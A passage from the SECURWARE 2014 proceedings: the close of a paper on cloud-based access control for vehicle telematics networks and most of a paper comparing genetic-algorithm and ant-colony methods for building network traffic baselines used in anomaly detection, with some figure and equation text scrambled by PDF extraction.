machine ”avatar” in a cloud computing environment, allows
a better control of the processes of information exchange and
the current status of all road users.
The task of finding an optimal allocation of virtual machines to minimize the number of nodes used by the cloud
system is similar to the N–dimensional problem of packing
containers (Bin Packing Problem), where N corresponds to
the number of virtual machine’s selected characteristics taken
into account in the allocation. In [13], specialists of our
department proposed a new approach for virtual machines
distribution. A new virtual machines scheduler is able to place
a virtual machine on the optimal compute node and migrate
it to another node if resource consumption state has been
changed. In [13], the proposed algorithm allows to optimize
the structure of high-performance computing cloud system,
facilitates localization of data and computing resources, and
reduces the time required to provide a user requested services.
Cloud can improve system performance through the use
of parallelization technology. When a large multi–node cluster
needs to access large amounts of data, task scheduling becomes
a challenge. Apache Hadoop is a cluster computing framework
for distributed data analytics. However, the performance of
each job depends on the characteristics of the underlying
cluster and mapping tasks onto Central Processing Unit (CPU)
cores and Graphics Processing Unit (GPU) devices provides
significant challenges. Spark provide interesting advantages to
the typical Hadoop platform [14]. Spark is an open source
cluster computing system provides primitives for in–memory
cluster computing. Job can load data into memory and query
it repeatedly much quicker than with disk–based systems.To
make programming faster, Spark integrates into the Scala
language. Scala is statically typed high–level programming
language designed to express common programming patterns
in a concise, elegant, and type–safe way. Scala runs on
the Java Virtual Machine (JVM) so it integrates features of
object–oriented and functional languages. Spark is built around
distributed datasets that support types of parallel operations:
transformations, which are lazy and yield another distributed
dataset (e.g., map, filter, and join), and actions, which force
the computation of a dataset and return a result (e.g., count)
[15]. In our work, we propose to use Deep Content Inspection
(DCI) that reconstructs, decompresses, and decodes network
traffic packets into their constituting application level objects.
DCI examines the entire object and detects any malicious or
non-compliant intent.
While solving information security problems for vehicular
networks, we rely on our expertise in the field of robots
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
control, for example during the space experiment ”Kontur-2”
[16]. Using DCI for network traffic monitoring enables us to
provide the required level of security for on-surface robots,
and traffic prioritization methods in packets processing allow
us to provide the required level of Quality Of Service (QoS)
[17] [18].
VI. C ONCLUSION
Considering the vehicle as the dynamic cyber-physical
object in non-deterministic environment, we propose to use
the methods of cloud services information security to solve
the problem of access control to the cars telematics network.
Vehicular security devices developed from mechanical
through electromechanical and electronical to software based
systems.
From the viewpoint of information security, the vehicle
can be regarded as the dynamic virtual machine in the cloud
environment.
In this paper, we propose an architecture of a secure cloud
computing environment, which involves the use of static and
dynamic access control methods.
It is necessary to mention that proposed solution doesnt
solve all security problems of vehicular networks. The model
described above can be merged easily with other methods of
security control, for example with encryption or obfuscation.
The prototype of the proposed system is currently developing
for the Ford Motors Company at the Telematics department of
the Saint-Petersburg State Polytechnical University.
ACKNOWLEDGMENT
This paper funded by RFBR grant 13-07-12106 and is done
in the framework of the project with the Ford Motor Company.
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
R EFERENCES
I. Studnia, V. Nicomette, E. Alata, Y. Deswarte, M. Kaâniche, and
Y. Laarouchi, “Security of embedded automotive networks: state of the
art and a research proposal,” in SAFECOMP 2013 - Workshop CARS
(2nd Workshop on Critical Automotive applications : Robustness
& Safety) of the 32nd International Conference on Computer
Safety, Reliability and Security, Toulouse, France, 2013, J. Fabre,
P. Quéré, and M. Trapp, Eds. HAL, 2013. [Online]. Available:
http://hal.archives-ouvertes.fr/SAFECOMP2013-CARS/hal-00848234
B. Donohue, “Hacking the Modern Automobile,” 2013, URL:
http://blog.kaspersky.com/car-hacking/ [accessed: 2014-10-01].
A. Weimerskirch, “Automotive Data Security,” 2012, URL:
http://www.sae.org/events/gim/presentations/2012/
weimerskirch escrypt.pdf [accessed: 2014-10-01].
A. L. Fradkov, Cybernetical Physics: Principles and Examples. Nauka,
Saint-Petersburg, Russia, 2003, ISBN: 5-02-025028-7.
J. A. Wheeler, “Information, physics, quantum: the search for links,”
in Proceedings of the 3rd International Symposium Foundations of
Quantum Mechanics in the Light of New Technology, Kokubunji,
Tokyo, Japan, August 28-31, 1989, N. B. Gakkai, Ed. Hitachi, Ltd.,
1989, pp. 354–368.
G. Niemeyer and J.-J. E. Slotine, “Telemanipulation with
time delays,” The International Journal of Robotics Research,
vol. 23, no. 9, 2004, pp. 873–890. [Online]. Available:
http://ijr.sagepub.com/content/23/9/873.abstract
V. Zaborovsky, O. Zayats, and V. Mulukha, “Priority queueing with
finite buffer size and randomized push-out mechanism,” in Networks
(ICN), 2010 Ninth International Conference on, April 2010, pp. 316–
320.
V. Zaborovsky and V. Mulukha, “Access control in a form of active
queuing management in congested network environment,” in Networks
(ICN), 2011 Tenth International Conference on, 2011, pp. 12–17.
60
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
V. Zaborovsky, A. Gorodetsky, and V. Muljukha, “Internet performance:
Tcp in stochastic network environment,” in Evolving Internet, 2009.
INTERNET ’09. First International Conference on, Aug 2009, pp. 21–
26.
V. Zaborovsky, V. Mulukha, A. Silinenko, and S. Kupreenko, “Dynamic
firewall configuration: Security system architecture and algebra of the
filtering rules,” in Evolving Internet, 2011. INTERNET ’11. Third
International Conference on, Jun 2011, pp. 40–45.
V. Zaborovsky, V. Mulukha, and A. Silinenko, “Access control model
and algebra of firewall rules,” in WORLDCOMP11: Proceedings
of the 2011 International Conference on Security and Management
(SAM2011). CSREA Press, Jul 2011, pp. 115–120.
V. Zaborovsky, A. Lukashin, S. Kupreenko, and V. Mulukha, “Dynamic
access control in cloud services,” in Systems, Man, and Cybernetics
(SMC), 2011 IEEE International Conference on, Oct 2011, pp. 1400–
1404.
A. Lukashin and A. Lukashin, “Resource scheduler based on multiagent model and intelligent control system for openstack,” in Internet
of Things, Smart Spaces, and Next Generation Networks and Systems,
ser. Lecture Notes in Computer Science, S. Balandin, S. Andreev, and
Y. Koucheryavy, Eds. Springer International Publishing, 2014, vol.
8638, pp. 556–566.
T. Kumawat, P. K. Sharma, D. Verma, K. Joshi, and K. Vijeta,
“Implementation of spark cluster technique with scala,” in
International Journal of Scientific and Research Publications (IJSRP),
vol. 2, 2012. [Online]. Available: http://www.ijsrp.org/research-paper1112/ijsrp-p1181.pdf [accessed: 2014-10-01]
A. Lukashin, L. Laboshin, V. Zaborovsky, and V. Mulukha, “Distributed
packet trace processing method for information security analysis,” in
Internet of Things, Smart Spaces, and Next Generation Networks and
Systems, ser. Lecture Notes in Computer Science, S. Balandin, S. Andreev, and Y. Koucheryavy, Eds. Springer International Publishing,
2014, vol. 8638, pp. 535–543.
V. Zaborovsky, M. Guk, V. Muliukha, and A. Ilyashenko, “Cyberphysical approach to the network-centric robot control problems,” in
Internet of Things, Smart Spaces, and Next Generation Networks and
Systems, ser. Lecture Notes in Computer Science, S. Balandin, S. Andreev, and Y. Koucheryavy, Eds. Springer International Publishing,
2014, vol. 8638, pp. 619–629.
A. Ilyashenko, O. Zayats, V. Muliukha, and L. Laboshin, “Further
investigations of the priority queuing system with preemptive priority
and randomized push-out mechanism,” in Internet of Things, Smart
Spaces, and Next Generation Networks and Systems, ser. Lecture Notes
in Computer Science, S. Balandin, S. Andreev, and Y. Koucheryavy,
Eds. Springer International Publishing, 2014, vol. 8638, pp. 433–443.
V. Muliukha, A. Ilyashenko, O. Zayats, and V. Zaborovsky,
“Preemptive
queueing
system
with
randomized
push-out
mechanism,”
Communications
in
Nonlinear
Science
and
Numerical Simulation, 2014, p. in print. [Online]. Available:
http://www.sciencedirect.com/science/article/pii/S1007570414004031
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
61
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Digital Signature of Network Segment Using Genetic Algorithm and Ant Colony
Optimization Metaheuristics
Paulo R. G. Hernandes Jr.∗ , Luiz F. Carvalho†, Gilberto Fernandes Jr.† , Mario Lemes Proença Jr.†
∗ Security
Information Department, São Paulo State Technological College (FATEC), Ourinhos, Brazil
Science Department, State University of Londrina (UEL), Londrina, Brazil
{paulogalego, luizfcarvalhoo, gil.fernandes6}@gmail.com, proenca@uel.br
† Computer
Abstract—Every day computer networks have more significance
in our lives, and these network’s complexity is still growing.
To help customers achieve maximum productivity and avoid
security risks, network administrators have to manage network
resources efficiently. Traffic monitoring is an important task,
which describes the network’s normal behavior. Thereby, we
present a Digital Signature of Network Segment using Flow
Analysis (DSNSF) as a mechanism to assist network management
and information security through traffic characterization. Our
new approach uses a genetic algorithm to optimize the process.
In order to accomplish this task, we compared the novel model
with another similar method, Ant Colony Optimization for Digital
Signature (ACODS), using a real data set of traffic for bits and
packets. We also evaluate these models to measure their accuracy.
Keywords–Traffic Characterization; Traffic Monitoring; Network Management; Genetic Algorithm, sFlow.
I. I NTRODUCTION
Network Management is a complex task which utilizes
different tools and techniques. These tools and techniques aim
not only to help network administrators in their daily tasks, but
also to provide them with mechanisms which enable them to
detect information regarding security events in order to avoid
security incidents.
Since the first networked computers, the administrators
required all the necessary information about their equipments,
so they could understand the behavior of their network by
observing information, such as an interface’s traffic or which
port in a remote switch are being used. Thereby management
protocols and tools emerged.
The Simple Network Management Protocol (SNMP) became popular because of its simplicity and its ability to be
used by most equipment manufacturers [1]. Using SNMP,
we can monitor whether the equipment is functioning, its
traffic average and other additional information when required.
Nevertheless, with the increase of the complexity of applications that run on networks, such as VoIP, P2P, video on
demand, and also the increase of mobile equipment and the
Internet of Things, an SNMP protocol alone was not enough
for all information required by the network administrators.
With the use of data flow, network administrators could have
more detailed information to take decisions quicker and more
efficiently.
A flow record reports at least the endpoint addresses, time,
and volume of information transferred between two sockets.
This gives a better view of the traffic than interface-level
counters queried by SNMP, and it provides significant data
reduction compared to packet traces, allowing it to scale to
large networks [2]. The study of flow records can help network
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
administrators identify anomalies in their environments. As a
result, researchers are trying to find anomaly detection models
based on traffic characterization. These models, as described
by Lakhina et al. [3], are able to identify an anomalous
behavior based on traffic history, learning the standard behavior
of an environment, and based on its history detect changes in
the network routine.
A network anomaly detection system, first creates a baseline profile of the normal system, network, or program activity.
Thereafter, any activity deviating from the baseline is treated as
a possible intrusion [4]. It helps administrators to identify any
attack or network anomalous behavior, such as users running a
P2P application or any other activity which is against company
policies.
To reach our target, we use a Genetic Algorithm (GA), a
model which simulates the natural evolution process through
operators such as selection, crossover and mutation [5]. GA is
recognized as an ideal optimization technique to solve large
variety of problems. One of the best uses for GA is to optimize
search problems, or organize data under some conditions.
Our proposal is to create a Digital Signature of Network Segment using Flow Analysis (DSNSF) utilizing GA
to optimize the clustering process and characterize network
traffic using flow analysis to permit detection of network
anomalies. We use a real set of data to perform the process
and evaluate the results to prove the accuracy of our model.
Also, we compared this technique with another approach, the
Ant Colony Optimization for Digital Signature (ACODS).
This paper is organized as follows: Section II presents the
related work. Section III details the novel method DSNSFGA and also the ACODS approach, both used to characterize
network traffic. Section IV delivers the generation of the
DSNSF-GA. Section V presents the result of our evaluation
tests, and finally Section VI concludes this paper.
II. R ELATED W ORK
The target of our work is to characterize network traffic and
permit network administrators identify anomalous behavior in
their environments. For this purpose, we created a DSNSF.
This methodology to characterize network traffic was proposed
by Proença et al. [6] in which a Digital Signature of Network
Segment (DSNS) was created using data of each day, usually
a workday, based on the history of the previous weeks.
A Firefly Harmonic Clustering Algorithm (FHCA) [7], an
optimized clustering algorithm based on the fireflies behavior
and its emitted light characteristics, used data acquired using
SNMP. To characterize network traffic, certain techniques
could be applied such as Holt-Winters for Digital Signature
62
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
(HWDS), a modification of the classic statistical method
of forecasting Holt-Winters [8] or the K-means for Digital
Signature (KMDS) [9], where a DSNS is created using KMeans clustering technique. The ACODS approach presented
by Carvalho et al. [10] is based on Ant Colony Optimization
metaheuristic. For DSNSF creation, the ACODS aims to
optimize the clustering process, seeking solutions to make it
possible to extract patterns of network traffic.
GA was proposed by Holland [5] to simulate the natural
evolution process, and it is recognized as an ideal solution
to solve problems with a large solution variation. One of the
usages of GA is the optimization of the clustering process. A
cluster is a group of data which are organized in groups. Data
within the same group should be similar and data within other
groups should be different. A group is also called cluster. A
genetic algorithm-based clustering technique was proposed by
[11] and uses the Euclidean distance as the objective function,
to classify in which cluster each point should be. This is an
example of a profitable way to organize data among clusters
using GA and clusterization.
In Xiaopei et al. [12], an Artificial Immune System is
used along with GA in order to optimize the process. An
immune system produces plenty of antibodies to resist an
antigen, which is an attribute much similar to the individual
diversity of GA. Applying GA to this memory identifying
function can enhance the quality of the generated detectors
therefore improving the efficiency of detection. In Guo et
al. [13], a Network Anomaly Intrusion Detection based on
Genetic Clustering uses the cluster centers as binary code to
organize data and detect intruders. However, if the number of
clusters and the length of chromosomes are too large, a system
operation inefficiency will be detected.
III. G ENERATION OF DSNSF
In this section, we present two metaheuristic strategies to
create a DSNSF using data as bits and packets per second.
These data were collected using sFlow to generate flows
from the network’s assets. Our purpose in this work is to
demonstrate that flow attributes bits and packets per second
can be used to identify a normal, or expected, traffic pattern.
The first model is based on the natural evolution of species theory, implemented in computing as Genetic Algorithm, which
simulates the natural process of evolution in a population. The
second uses the Ant Colony Optimization process, which is
based on ant colonies’ behavior. Both methods are appropriate
to the DSNSF construction and they will be described ahead.
A. DSNSF-GA
Our DSNSF-GA uses the Genetic Algorithm based approach to organize data in clusters. These data were collected
using sFlow in State University of Londrina (UEL). We use the
average among cluster centroids to generate a graph that will
show the network traffic by bits and packets per second using
the last three determined days in the week, and compare them
with the data of the current day to detect network anomalies.
For example, for a Monday we use data from the last three
Mondays (excluding the current day) to plot a graph with
the characterized network, and compare with these to detect
anomaly behavior.
GA is a technique which manipulates a population of potential problem solutions trying to optimize them. Specifically,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
they operate with a coded representation of solutions which
would be equivalent to genetic material (chromosomes) of
individuals in nature. Each individual will be assigned a fitness
value that will reflect the individual adaptability in an environment in comparison with others. As in nature, the selection
will elect the fittest individuals. These will be assigned for a
genetic combination, also called crossover, which will result
in the exchange of genetic material (reproduction), generating
a new population.
Mutation is a value modification in some genes belonging
to a solution with some probability p′ (the mutation probability). The function of mutation in GA is to restore lost or
unexplored genetic material in the population to prevent a premature convergence of a sub-optimal solution, and also to try
to find a better solution. Selection, crossover and mutation will
repeated for several generations for a fixed number of times,
or until some condition is reached. This cycle is represented
in Figure 1.
Figure 1. Genetic Algorithm cycle.
To help these mechanisms, there are other operations which
must be used to complete the GA process, such as selection
engine and crossover point selection. We must also determine
our objective and fitness functions, which are the functions being optimized. In our approach we use the Euclidean distance
as an objective and fitness function.
The number of clusters is fixed. We use the Euclidean
distance to determine the best distance of each point from their
respective cluster centers. Our chromosome was represented by
a real number, which is the value of the cluster center.
The Euclidean distance is given by
v
E X
K u
N
uX
X
t
J=
(xin − cjn )2
i=1 j=1
(1)
n=1
in which K is the total number of clusters, E represents
the amount of flows to be clustered and N indicates data
dimensionality, i.e., number of features to be processed. The
collected flows are divided in 5 minute intervals, totaling 288
data sets throughout the day. The variable xin denotes value
of the feature n of flow i and cjn stores value of center of
cluster j at n dimension.
We chose the Roulette Wheel approach to find the fittest
in the population, which conceptually consists of giving each
individual a slice of a circular wheel equal in area to the
individual’s fitness [14]. We spun the roulette for the same
number of individuals in the population. Those which were
selected more often were the fittest and will breed the new
generation.
63
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The crossover operator combines the chromosomes of two
parents to create a new one. In our approach, we have chosen
a random number to divide both chromosomes in the same
point and merge them in another one (child). This process
will continue until the old population be replaced by a new
population of ”children”.
To start the process, we generate a random initial population in which we began applying the crossover, selection and
mutation. As we have described, our chromosomes are the
cluster centroids values. We appointed an initial population
of forty parents. They create the new generation, which will
replace the old one. It will repeat for a number of sixty
iterations. For our purpose we conclude that sixty is an ideal
number, because a higher number will increase the effort
unnecessarily, and a lower one will not create an ideal solution.
At the end of this process, we have the best chromosome
based on its fitness function. This value represents a single
point in the DSNSF-GA. We have to apply the clusterization
using GA for each point in the graphic, so it will be repeated
for 288 times, one point every five minutes.
B. ACODS - Ant Colony Optimization for Digital Signature
Nature has been inspiring men in creating solutions for
human problems. Hence, a variety of biologically inspired
approaches have appeared in various research fields such as
engineering, computer science, medicine and economics. For
example, the ants’ ability to find the shortest path between
their colony and the food source has inspired the creation of a
very promising method called Ant Colony Optimization (ACO)
metaheuristic [15].
Similarly to real ants, ACO agents are able to organize
themselves using pheromone trail. They travel through the
search space represented by a graph G(V, E), where V is a
finite set of all nodes and E is the edges set. Agents are
attracted to more favorable locations to optimize an objective
function, i.e., those in which the concentration of pheromone
deposited by ants which previously went through the same
path is higher.
According to Jiang et al. [16], the ant colonies’ habits
living in groups are essentially similar to the grouping of
data. Algorithms based on the behavior of ants have natural
advantages in the application of cluster analysis. Thus, we
introduce the ACODS, a modification of the Ant Colony
Optimization metaheuristic for DSNSF creation using the
clustering approach.
In this paper, we assume that the edges of G are formed
between the center of a cluster (centroid) and each element
that will be clustered. ACODS runs iteratively and in each
iteration, an agent constructs a solution. Although each ant
has the ability to build a viable solution as well as a real ant
can somehow find a path between the colony and food source,
the highest quality solutions are obtained through cooperation
between individuals of the whole colony [17].
Algorithm 1 shows the steps executed by ACODS for
DSNSF creation. These activities are classified into 3 categories:
Build solutions: This step consists of the movement of ants
concurrently and asynchronously by the states of the problem.
It is determined by moving agents from one node to another
neighbor in the graph structure.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Algorithm 1 – ACODS used for DSNSF creation
Require: Set of bits and packets, number of clusters
Ensure: X: Vector representing the normal behavior for bits
and packet sets of a day arranged in 288 intervals of 5
minute, i.e. the DSNSF
1: for i = 1 to 288 do
2:
for t = 1 to number of iterations do
3:
Create solution
4:
Evaluate solutions through the objective function (1)
5:
Update the pheromone trail
6:
end for
7:
Calculate the center of each cluster of the best solution
found
8:
Xi ← Average among the clusters
9: end for
10: return X
Local Search: It aims to test and evaluate solutions created
by ants through a local search. In our model, we use the
objective function to measure how good are the solutions built
by the ants.
Pheromone Update: The pheromone trails are modified in
this process. The trails’ values can be incremented (when ants
deposit pheromones in the edge or connections between the
used nodes) or can be decremented. The increased concentration of pheromone is an essential factor in the algorithm
implementation, since it directs ants to seek new locations
more prone to acquire a near-optimal solution.
IV. C REATING A DSNSF-GA
To create our DSNSF-GA, our data were separated in files,
one per day. Every file has 86400 lines, which corresponds to
the amount of bits and packets per second in each line. As we
choose to generate the DSNSF-GA using data from every five
minutes, we selected 300 lines to generate a single point in
the graphic.
These lines were divided and later grouped in clusters
according to Euclidean distance. Using the Silhouette method
for interpretation and validation of clusters [18], best results
were reached using K = 3 and the GA were used to optimize
these distribution among the clusters. Each cluster has its
centroid, which is the center of its cluster. As we have three
centroids, we calculate the average among those three clusters,
which in turn should be the point allocated in the middle
of these clusters. At this stage we obtained one point in the
DSNSF-GA.
The operation of DSNSF-GA is shown in Algorithm 2.
The chromosomes are vectors, and they contain the value of
the cluster centroids. The length of a chromosome is defined
by N ∗ K, where N is the number of dimensions of our
search space and K is the number of clusters. As we have
three clusters, we distribute flow data among those clusters.
Each cluster has its centroid and these values will determine
a single gene in the chromosome.
For the initial population, we have generated randomly
forty chromosomes, and their values should be between the
minimum and maximum flow data values. These chromosomes
are used to generate new populations of individuals. The next
action is to determine the fittest individuals in a population.
64
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
6
Bits per Second Traffic of 10/02/2012 and Generated DSNSFs
x 10
Algorithm 2 – using GA to create the DSNSF
As previously described, we used a Roulette Wheel technique
to determine the best chromosomes. What will determine if an
individual is or is not fitted, is the shorter distance between all
points and their respective cluster centroid. If this distance is
lower in an individual than in others, it means the data inside
that cluster are well organized, i.e., there are more points closer
of its central point in a cluster than in others. In our approach,
we used the sum of the three clusters distance to determine
the fittest individuals which will procreate.
To yield new generations, individuals must mate between
each other. As in nature, the fittest individuals have a greater
probability of generating a new offspring, who will generate
new ones and so on. When two parents generate a new individual, they will combine their genetic material to a new progeny.
This probabilistic process of breeding a new population and
combining genetic material is the crossover. This is the key
process in a Genetic Algorithm based search, because at this
moment the exchange of genes will occur and our population
will be diversified. Since two parents reproduce, they will
switch genetic material and their children will be a copy
of both merged chromosomes. It will assure the population
diversity. For our purpose, the exchange of chromosomes
will improve the solution, where we are finding the shorter
total distance in a chromosome. An important part of the
crossover process is to define the crossover point, as we have
to choose between a single point crossover or a multi point
crossover. A single point crossover is indicated when there is
a larger population and we choose that technique to divide
our chromosomes. This single point is a random point which
divides two chromosomes in four (each of them in two), and
combines a couple of those to generate a new one [19].
For a initial population of ρ individuals, we choose τ =
ρ/2 corresponding to the fittest in these population to generate
a new population. These new population will be mixed to the
previous ones and will breed others. The Roulette is span to
choose τ , which will generate other children. Each one of these
iteration is called generation. Since there is no ideal stopping
criteria, usually a fixed iteration number is used. The process
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
2
1
current day
0
6
7
8
9
10
DSNSF−GA
11
12
13
ACODS
14 15 16
time (hours)
17
18
19
20
21
22
23
24
22
23
24
Packets per Second Traffic of 10/02/2012 and Generated DSNSFs
500
400
packets/s
Require: Set of bits and packets collected from historic
database, number of: clusters, initial population and iterations
Ensure: X: Vector representing the bits and packets of a day
arranged in 288 intervals, which means 5 minutes, i.e. the
DSNSF
1: for i = 1 to 288 do
2:
Initialize population ρ
3:
for t = 1 to number of iterations do
4:
Compute fitness for ρ
5:
Select the fittest using the Roulette Wheel
6:
Apply crossover to generate a new population τ
7:
Apply mutation if necessary
8:
Evaluate solutions through the objective function (1)
9:
end for
10:
Calculate the center of each cluster of the best solution
found (fittest)
11:
Xi ← average among the clusters
12: end for
13: return X
bits/s
3
300
200
100
0
6
7
current day
DSNSF−GA
8
11
9
10
12
13
ACODS
14 15 16
time (hours)
17
18
19
20
21
Figure 2. DSNSF-GA and ACODS for 2nd of October
of generating new populations will repeat for a fixed number
of times which we have set to sixty [20].
Each chromosome undergoes a mutation probability which
is a fixed number. Mutation allows the beginning and the
preservation of genetic variation in a population by introducing
other genetic structures modifying genes inside the chromosome. We establish a mutation tax of 5%. When the mutation
occurs we choose a mutation point, called M P , which will be
the point where we are going to change its value. This new
value is calculated using N ewi = Oldi + (δ × Oldi ), where
N ewi is the new individual, Oldi is the old individual, δ is
the randomic number 0 < n < 1 which determine if mutation
will or will not occur. The new chromosome will be used to
generate a new offspring.
At the end of all these processes we obtained the best
population. From this, we choose the best individual, which
is the chromosome with the shortest sum of distance between
each point in the cluster and its respective centroid. We
calculate now the mean among the three cluster centroids. This
number will represent a unique point in the DSNSF-GA, as we
choose to illustrate a five minute interval in the graphic.
The process of acquiring each value will be repeated for
other 288 times to create a graph representing one day in a
week. By using data from three days to generate this single
point, we now have a network signature of them, or the
DSNSF-GA.
V. T ESTS AND R ESULTS
We used a real data set for DSNSF creation. These data
were collected from State University of Londrina (UEL), and
exported using sFlow pattern. Afterwards, these flows are
divided in files containing 86400 lines, where each line has
the value corresponding to one second in a day. One file is for
packets and another one is for bits. As we have two methods
to compare, it is important to emphasize that we have set the
same number of clusters and iterations for both, ACODS and
DSNSF-GA.
In Proença et al. [6], a DSNS was created using data of
each day based on the history of its previous weeks. This
technique was also discussed by Assis et al. [21] and Lima
et al. [22]. Each of them have used a Digital Signature of
Network Segment to represent the network behavior efficiently.
For our purpose, we used only data between 06:00 and 24:00
65
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
6
4
ACODS
DSNSF−GA
0.4
Bits per Second Traffic of 10/12/2012 and Generated DSNSFs
x 10
3
bits/s
NMSE
bits per second
0.2
2
1
current day
0
1
2
3
4
5
8
9
Workdays from 1st to 12th of October
11
0
12
6
7
8
DSNSF−GA
9
bits per second
0.5
DSNSF−GA
ACODS
0
1
2
4
5
8
9
Workdays from 1st to 12th of October
11
ACODS
12
13
14 15 16
time (hours)
17
18
19
20
21
22
23
400
200
0
3
10
Packets per Second Traffic of 10/12/2012 and Generated DSNSFs
packets/s
1
Correlation
10
10
11
12
6
current day
DSNSF−GA
7
10
8
9
11
12
ACODS
13
14 15 16
time (hours)
17
18
19
20
21
22
23
Figure 3. NMSE and CC for bits per second for DSNSF-GA and ACODS
Figure 5. DSNSF-GA and ACODS for 12th of October (national holiday)
since we utilized data from a University and their working
hours are between 07:00 and 23:00. It is important to inform
that the 12th of October is a national holiday in Brazil, and
this is the reason for a different traffic behavior during that
day. We decided to keep this day to demonstrate the ability of
adaptation of the methods to similar situations.
Figure 2 shows the observed traffic of both, DSNSFGA and ACODS methods for bits and packets per second.
The figure represents the interval described before, October
2nd, 2012, where the green color is the current day, and
there are two lines, one for DSNSF-GA and another for
ACODS. As shown by this figure, both of them are able
to characterize network traffic, displaying the usual observed
traffic, the increase and decrease in usage following the same
pattern, and also a greater use of network resources during the
periods from 07:00 to 12:00 hours and from 13:00 to 23:00
hours.
To measure the accuracy of each method on DSNSFs
generation, we decided to adopt two different techniques:
Correlation Coefficient (CC) and Normalized Mean Square
Error (NMSE).
NMSE compares the mean of a series against certain
predicted values. If the NMSE is less than 1, then the forecasts
are doing better than the current traffic, but if it is greater
than 1, then the predictions are doing worse than the current
traffic. The CC measures how suitable a model is, resulting in
values varying from -1 to 1. A positive value indicates total
correlation, and values close to 0 mean bad or no correlation
between data and the adjustable model.
Figure 3 indicates that there is correlation between the
observed traffic and the predictions generated by the characterization from DSNSF, as the values are close to 1, both
in DSNSF-GA and ACODS. The 12th of October has a bad
correlation, and we can see in Figure 5 that the traffic was
lower than predicted. This day was a national holiday and
there was a little activity at the University. Also in Figure 3,
we observe values up to 0.7, meaning that the real traffic and
the DSNSF are correlated, except on 12th of October again
and on 5th of October.
We investigated what the cause was for the bad correlation 5th of October. The network administrator discovered,
analyzing log files, that there was an input HTTP traffic in
large scale, caused by students applying for new classes of
postgraduate courses. The University was offering 53 new
classes that semester, and it was not only the first day but
also the only way to apply for a class via the Internet. Figure
4 shows NMSE and CC for packets per second with the same
results, indicating that both methods present good error rates,
achieving averages NMSE values of 0.4 including the national
holiday, and less than 0.1 excluding it. In addition to this, we
get an average correlation of 0.75 with the holiday and 0.8
without it.
Both methods are able to characterize network traffic efficiently, as we can see a small difference between the predicted
traffic and the real traffic in a normal day. Although we have
no threshold to distinguish anomalous from normal behavior,
we can see in figures that when good values were observed for
CC and NMSE , a normal traffic pattern was also observed.
Abnormal values, after investigation, were found to be derived
from anomalous traffic.
NMSE
packets per second
DSNSF−GA
ACODS
0.2
0.1
0
1
2
3
4
5
8
9
Workdays from 1st to 12th of October
11
12
packets per second
1
Correlation
10
0.8
0.6
DSNSF−GA
ACODS
0.4
0.2
1
2
3
4
5
8
9
Workdays from 1st to 12th of October
10
11
Figure 4. NMSE and CC for packets per second for DSNSF-GA and
ACODS
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
12
A. Computational complexity
The methods computational complexity are presented as
asymptotic notation based on amount of executed instructions.
Initially, the ACODS algorithm partitions a set E of data by
66
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
K centers of N dimensions, resulting in O(EKN ). Using the
population of ants to assist the search of the best centers for the
collation of data and, as all the ants are compared with each
other in pursuit of the final solution, a quadratic complexity is
added, ensuring O(EKN M 2 ). Taking the number of iterations
T into account as stopping criterion of the algorithm, we have
a final complexity of O(EKN M 2 T ). Although a maximum
of interactions T is defined, ACODS quickly converges to a
solution.
Selection operator is executed by the Roulette Wheel, one
of the simplest and most traditional methods. As the choice
of the roulette slices is done by a linear search from the
beginning of the list, each selection requires O(ρ) because,
on average, half of the list will be searched. In general, the
roulette method uses O(ρ2 ) steps, since an offspring will
be bred from the crossover between ρ parents. Crossover
and mutation operations present linear behavior of O(ρ). All
these processes are executed for the N dimensions (bits and
packets). Thereby, the activities number performed by DSNSFGA during iterations are given by O(EKN H 2 T ).
VI. C ONCLUSION AND FUTURE WORKS
In terms of computational complexity, both methods use
meta-heuristics algorithms to find an optimal solution.There
are a number of iterations until a certain condition is reached,
and both of them used the same value.
The DSNSF-GA method, introduced in this paper, uses the
Genetic Algorithm technique to improve data clusterization
and it characterizes network traffic using data collected by
sFlow. To estimate network traffic, we organize data simulating
the natural evolution process of the nature. Using natural
operators like selection of the fittest, crossover and mutation
we can obtain the best individuals in a population. We used
the shortest distance among each point in a cluster and their
respective centroid to determine who are the fittest, which
represents a single point in the DSNSF-GA. These digital
network signatures can be used, in the future, by network
administrators to identify anomalous traffic in their environments, by comparing the real current traffic with the predicted
traffic. As previously described, when we identified a flash
crowd traffic caused by new classes of postgraduate students,
a large input traffic was associated with the beginning of online
applications, and the management of network resources could
be done automatically.
In future works, we intend to increase the number of
dimensions, including new flow data. This multidimensional
approach will improve traffic characterization, as we will use
more detailed information about the network behavior. Also,
we plan to develop a model to establish a threshold for the
DSNSF, to distinguish anomalous from normal behavior, being
possible to identify, in real time, network anomalies.
ACKNOWLEDGMENT
This work was supported by SETI/Fundação Araucária and
MCT/CNPq for Betelgeuse Project financial support. Also the
authors would thanks São Paulo State Technological College
(Fatec Ourinhos).
R EFERENCES
[1]
[2] B. Trammell and E. Boschi, “An introduction to ip flow information
export (ipfix),” IEEE Communications Magazine, vol. 49, no. 4, 2011,
pp. 89–95.
[3] A. Lakhina, M. Crovella, and C. Diot, “Characterization of networkwide anomalies in traffic flows,” in Internet Measurement Conference,
2004, pp. 201–206.
[4] A. Patcha and J.-M. Park, “An overview of anomaly detection techniques: Existing solutions and latest technological trends,” Computer
Networks, vol. 51, no. 12, 2007, pp. 3448–3470.
[5] J. H. Holland, Adaptation in Natural and Artificial Systems: An Introductory Analysis with Applications to Biology, Control and Artificial
Intelligence. Cambridge, MA, USA: MIT Press, 1992.
[6] M. L. Proenca Jr., C. Coppelmans, M. Bottoli, and L. Souza Mendes,
